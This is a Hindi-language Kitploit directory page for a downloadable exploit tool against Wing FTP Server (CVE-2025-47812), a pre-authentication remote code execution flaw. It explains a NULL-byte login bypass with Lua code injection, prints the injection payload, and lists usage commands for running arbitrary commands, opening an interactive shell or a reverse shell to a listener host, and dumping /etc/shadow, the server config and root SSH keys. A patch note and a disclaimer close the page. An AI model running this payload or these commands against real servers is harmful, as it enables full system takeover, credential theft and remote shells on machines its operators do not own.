Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47812 — RCE for WingFTP v4.7.3 | Kitploit
उपकरण/GitHubGitHub/popyue/cve-2025-47812
ExploitationWeb Application ExploitationPenetration TestingAuthenticationRemote Access ToolPayload Development
GitHubpopyue/cve-2025-47812

CVE-2025-47812

RCE for WingFTP v4.7.3

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47812 — Wing FTP Server बिना प्रमाणीकरण के RCE

root@kitploit:~
 ██╗    ██╗██╗███╗   ██╗ ██████╗     ███████╗████████╗██████╗
 ██║    ██║██║████╗  ██║██╔════╝     ██╔════╝╚══██╔══╝██╔══██╗
 ██║ █╗ ██║██║██╔██╗ ██║██║  ███╗    █████╗     ██║   ██████╔╝
 ██║███╗██║██║██║╚██╗██║██║   ██║    ██╔══╝     ██║   ██╔═══╝
 ╚███╔███╔╝██║██║ ╚████║╚██████╔╝    ██║        ██║   ██║
  ╚══╝╚══╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝     ╚═╝        ╚═╝   ╚═╝

अवलोकन

फ़ील्डविवरण
CVECVE-2025-47812
प्रभावितWing FTP Server <= 7.4.3
ठीक किया गयाWing FTP Server 7.4.4
CVSS10.0 (गंभीर)
प्रमाणीकरण आवश्यकनहीं (अनाम लॉगिन पर्याप्त)
प्राप्त विशेषाधिकारroot (Linux) / NT AUTHORITY\SYSTEM (Windows)
खोजकर्ताJulien Ahrens (@MrTuxracer) — rcesecurity.com

कमज़ोरी का विवरण

Wing FTP Server का वेब इंटरफ़ेस दो-चरणीय प्री-प्रमाणीकरण रिमोट कोड निष्पादन हमले के लिए संवेदनशील है।

चरण 1 — NULL बाइट प्रमाणीकरण बाइपास + Lua कोड इंजेक्शन

Wing FTP बाइनरी में c_CheckUser() फ़ंक्शन आंतरिक रूप से strlen() का उपयोग करता है, जो पहले NULL बाइट (\x00) पर उपयोगकर्ता नाम स्ट्रिंग को काट देता है। इसका मतलब है कि anonymous%00<मनमाना_डेटा> जैसा उपयोगकर्ता नाम प्रमाणीकरण पास कर लेगा जब तक anonymous (या कोई मान्य उपयोगकर्ता) मौजूद है।

प्रमाणीकरण सफल होने के बाद, loginok.html पूर्ण, अशोधित POST पैरामीटर का उपयोग करके rawset(_SESSION, "username", username) कॉल करता है — जिसमें NULL बाइट के बाद का सब कुछ शामिल है। फिर सत्र को SessionModule.save() के माध्यम से एक Lua स्क्रिप्ट फ़ाइल में डिस्क पर क्रमबद्ध किया जाता है।

चूंकि क्रमबद्ध फ़ंक्शन स्ट्रिंग मानों को बिना किसी स्वच्छता के [[...]] Lua लॉन्ग स्ट्रिंग लिटरल में लपेटता है, उपयोगकर्ता नाम में ]] इंजेक्ट करने से स्ट्रिंग लिटरल जल्दी समाप्त हो जाता है, जिससे सत्र फ़ाइल में मनमाना Lua कोड जोड़ा जा सकता है।

पेलोड संरचना:

root@kitploit:~
anonymous\x00]]
local h = io.popen("id")
local r = h:read("*a")
h:close()
print(r)
--

अंत में -- Wing FTP द्वारा मान के बाद जोड़े जाने वाले ]] को टिप्पणी कर देता है।

चरण 2 — प्रमाणित एंडपॉइंट के माध्यम से ट्रिगर

सत्र फ़ाइल (जिसका नाम UID कुकी मान पर आधारित है) एक Lua स्क्रिप्ट है जो किसी भी प्रमाणित एंडपॉइंट तक पहुँचने पर loadfile() + f() के माध्यम से निष्पादित होती है। UID कुकी के साथ POST /dir.html भेजने से इंजेक्टेड Lua निष्पादित होता है और <?xml सामग्री से पहले रिस्पॉन्स बॉडी में कमांड आउटपुट लौटाता है।


आवश्यकताएँ

  • Python 3.10+
  • requests, urllib3
root@kitploit:~
pip install -r requirements.txt

उपयोग

root@kitploit:~
usage: CVE-2025-47812 [-h] [-U USER] [-P PASS] [--vhost HOST] [--timeout N]
                      [--verify-ssl]
                      [--cmd CMD | --shell | --revshell | --dump]
                      [--lhost IP] [--lport PORT] [--listen]
                      target

उदाहरण

root@kitploit:~
# एकल कमांड
python3 CVE-2025-47812.py http://ftp.target.com --cmd "id"
python3 CVE-2025-47812.py http://ftp.target.com --cmd "cat /etc/passwd"

# IP द्वारा लक्ष्य (Wing FTP वर्चुअल-होस्ट रूटिंग का उपयोग करता है — --vhost के साथ होस्टनाम प्रदान करें)
python3 CVE-2025-47812.py http://10.10.10.10 --vhost ftp.target.com --cmd "id"

# इंटरैक्टिव स्यूडो-शेल
python3 CVE-2025-47812.py http://ftp.target.com --shell

# रिवर्स शेल (nc लिसनर अलग से शुरू करें)
python3 CVE-2025-47812.py http://ftp.target.com --revshell --lhost 10.10.14.5 --lport 4444

# बिल्ट-इन लिसनर के साथ रिवर्स शेल
python3 CVE-2025-47812.py http://ftp.target.com --revshell --listen --lhost 10.10.14.5 --lport 4444

# संवेदनशील फ़ाइलें डंप करें (/etc/passwd, /etc/shadow, Wing.cfg, रूट SSH कुंजी)
python3 CVE-2025-47812.py http://ftp.target.com --dump

# गैर-अनाम क्रेडेंशियल के साथ
python3 CVE-2025-47812.py http://ftp.target.com -U ftpuser -P secret --cmd "whoami"

समाधान

Wing FTP Server को संस्करण 7.4.4 या उसके बाद में अपग्रेड करें।


संदर्भ

  • मूल लेख: https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
  • संबंधित: CVE-2025-47811 (अत्यधिक अनुमेय सेवा विशेषाधिकार), CVE-2025-47813 (अत्यधिक लंबी UID कुकी के माध्यम से पथ प्रकटीकरण)

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए प्रदान किया गया है। इस एक्सप्लॉइट को उन सिस्टमों पर चलाना जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध और अनैतिक है। लेखक किसी भी दुरुपयोग के लिए कोई दायित्व नहीं लेता है।

टूल डाउनलोड करें